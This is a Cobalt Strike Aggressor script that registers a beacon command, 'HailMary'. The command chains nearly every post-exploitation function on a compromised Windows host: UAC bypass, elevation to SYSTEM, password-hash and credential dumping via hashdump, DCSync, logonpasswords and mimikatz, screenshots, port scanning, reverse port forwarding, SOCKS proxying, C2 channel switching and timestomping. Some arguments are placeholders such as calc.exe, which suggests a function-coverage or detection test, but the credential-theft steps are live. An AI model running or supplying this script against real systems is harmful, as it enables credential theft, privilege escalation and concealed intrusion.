
beacon_command_register("HailMary", "DA BOMB",
	"Syntax: HailMary\n" .
	"Mother of all Bombs");

#HailMary Alias
alias HailMary {
	
	HailMary($1);

}

sub HailMary {
	
	$internal = beacon_data($1) ["internal"];
	bbrowserpivot($1);
	bbypassuac($1);
	bcancel($1);
	bcd($1, "C:\\");
	bcheckin($1);
	bclear($1);
	#bcovertvpn($1);
	bcp($1, "C:\\Windows\\System32\\calc.exe", "C:\\");
	bdcsync($1);
	bdesktop($1);
	bdownload($1, "C:\\Windows\\System32\\calc.exe");
	bdrives($1);
	belevate($1);
	bexecute($1, "C:\\Windows\\System32\\calc.exe");
	#bexit($1);
	bgetsystem($1);
	bgetuid($1);
	bhashdump($1);
	bhelp($1);
	#binject($1, )
	bjobs($1);
	#bkerberos_ticket_purge($1);
	#bkeylogger($1)
	#bkill($1)
	#blink
	blogonpasswords($1);
	bls($1, "C:\\");
	bmimikatz($1, "standard:coffee");
	bmkdir($1, "C:\\test\\");
	bmode($1, "dns-txt");
	bmode($1, "dns");
	bmode($1, "dns6");
	bmode($1, "http");
	bmode($1, "smb");
	bmv($1, "C:\\calc.exe", "C:\\test\\");
	bnet($1, "share");
	bnote($1, "test");
	bportscan($1, "127.0.0.1", "445", "arp", 1024);
	bpowerpick($1, '$PSVersionTable.PSVersion');
	bpowershell($1, "ls");
	bps($1);
	#bpsexec($1, )
	bpwd($1);
	brev2self($1);
	brm($1, "C:\\test");
	brportforward($1, 80, "$internal", 80);
	#provide creds for test brunas($1, )
	bscreenshot($1, 0);
	bshell($1, "dir");
	bsleep($1, 15);
	bsocks($1, 9050);
	bsocks_stop($1);
	btimestomp($1, "C:\\Windows\\System32\\calc.exe", "C:\\Windows\\System32\\notepad.exe");
	bwdigest($1);

}

